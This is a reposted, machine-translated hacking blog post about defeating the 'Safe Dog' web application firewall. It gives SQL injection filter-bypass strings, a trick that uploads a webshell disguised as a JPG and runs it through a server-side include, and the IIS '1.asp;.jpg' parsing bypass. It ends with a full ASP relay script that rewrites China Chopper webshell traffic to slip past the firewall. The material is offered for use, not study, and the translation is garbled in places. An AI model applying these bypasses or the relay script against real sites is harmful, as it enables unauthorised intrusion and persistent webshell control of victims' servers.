A summary of the experience of killing safe dogs in seconds

Source: Internet
Author: User

What are the main aspects of a safe dog:

1. Over-injection

2. Oversized horses are blocked to visit

3. Over chopper connection A word was intercepted

4. Over 1.asp;. JPG such a file

I haven't met any of the others.

Now at 1.1 o ' Talk:

1. Over-injection

Method One: A.asp?aaa=%00&id=sql statement

Method Two: A.asp?id=sql statement inside the security filter to add a%l such as: un%aion sel%aect 1,2,3,4 fr%aom Admin

2. Oversized horses are blocked to visit

Method One: Upload a big horse and then visit http://sss.com/dama.asp; Interception occurs after the visit.

Then the solution first dama.asp renamed Dama.jpg Upload, and then upload files in the same directory da.asp content: <!--#include file= "dama.jpg"-so again visit da.asp will not be intercepted.

3. Over chopper connection A word was intercepted

Method One: Do not use the kitchen knife to connect a word, with another sentence to connect the end.

Method Two: Connect the chopper under the relay, replace the filtered words.

4. Over 1.asp;. JPG such as file interception

Method one: 1.asp;. Jpg

Method Two: Secrecy

Specifically for everyone summed up so much, safe dog anyway basically can ignore!!

What else to add can be sent below!

The following script is the use of a safe dog connection chopper: First put the script into an executable. asp directory

And then visit http://www.hack70.cn/asf.asp?dz=, the Webshell address you're going to have.

Then enter the address into the chopper password or the one you want to Webshell. The type of the password is also the choice of the word trojan suffix type

Example: http://www.hack70.cn/asf.asp?dz=http://xxx.com/yijuhua.php password

So input on the chopper

This script temporarily supports. php. aspx for a word connection. The ASP may not yet have been tested. If anyone has a safe dog, Webshell can tell me. I'll test it again to make this script modification fully supported!

<%

' The principle of Rao, grasping the chopper to connect the Webshell bag and then study the security dog filter which keyword relay to replace those keywords to filter out!

Jmstr=replace (Request.Form, "$_post", "$_request")

Jmstr=replace (Jmstr, "->|", "-->|")

Jmstr=replace (Jmstr, "@eval (", "@eval (")

Jmstr=replace (Jmstr, "System.Convert.FromBase64String", "System.Convert". FromBase64String ")

Jmurl=request ("DZ")

Response.Write Request ("DZ")

Jmref=jmurl

Jmcok= ""

' Ghost Brother

' Chopper break safe dog Connection!

' Www.hack70.cn

Response.Write PostData (JMURL,JMSTR,JMCOK,JMREF)

Function PostData (POSTURL,POSTSTR,POSTCOK,POSTREF)

Dim Http

Set Http = Server.CreateObject ("Msxml2.serverxmlhttp")

With Http

. Open "POST", Posturl,false

. setRequestHeader "Content-length", Len (POSTSTR)

. setRequestHeader "Content-type", "application/x-www-form-urlencoded"

. setRequestHeader "Referer", Postref

‘. setRequestHeader "Cookie", Postcok

. Send Poststr

PostData =. Responsebody

End with

Set Http = Nothing

PostData =bytes2bstr (postdata)

End Function

Function Bytes2bstr (vIn)

Dim Strreturn

Dim I, Thischarcode, Nextcharcode

Strreturn = ""

For I = 1 to LenB (vIn)

Thischarcode = AscB (MidB (VIn, I, 1))

If Thischarcode < &h80 Then

Strreturn = Strreturn & Chr (Thischarcode)

Else

Nextcharcode = AscB (MidB (vIn, I + 1, 1))

Strreturn = Strreturn & Chr (CLng (thischarcode) * &h100 + CInt (nextcharcode))

i = i + 1

End If

Next

Bytes2bstr = Strreturn

End Function

Function urlencoding (Vstrin)

Strreturn= ""

Dim I

For I=1 to Len (Vstrin)

Thischr=mid (vstrin,i,1)

If Abs (ASC (THISCHR)) < &HFF Then

Strreturn=strreturn & THISCHR

Else

INNERCODE=ASC (THISCHR)

If Innercode<0 Then

Innercode=innercode + &h10000

End If

Hight1= (Innercode and &HFF00) \&hff

Low1=innercode and &hff

Strreturn=strreturn & "%" & Hex (Hight1) & "%" & Hex (LOW1)

End if

Next

Strreturn=replace (STRRETURN,CHR (32), "%20") ' Convert spaces, if the site filters spaces, try to replace%20 with/**/

Strreturn=replace (STRRETURN,CHR), "%2b") ' JMDCW increase conversion + character

' Strreturn=replace (Strreturn, filter character, "Convert to Character") ' here to add code to filter

Urlencoding=strreturn

End Function

%>


This article is from "My World, I am the director." "Blog, be sure to keep this provenance http://biock.blog.51cto.com/4643304/1643919

A summary of the experience of killing safe dogs in seconds

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.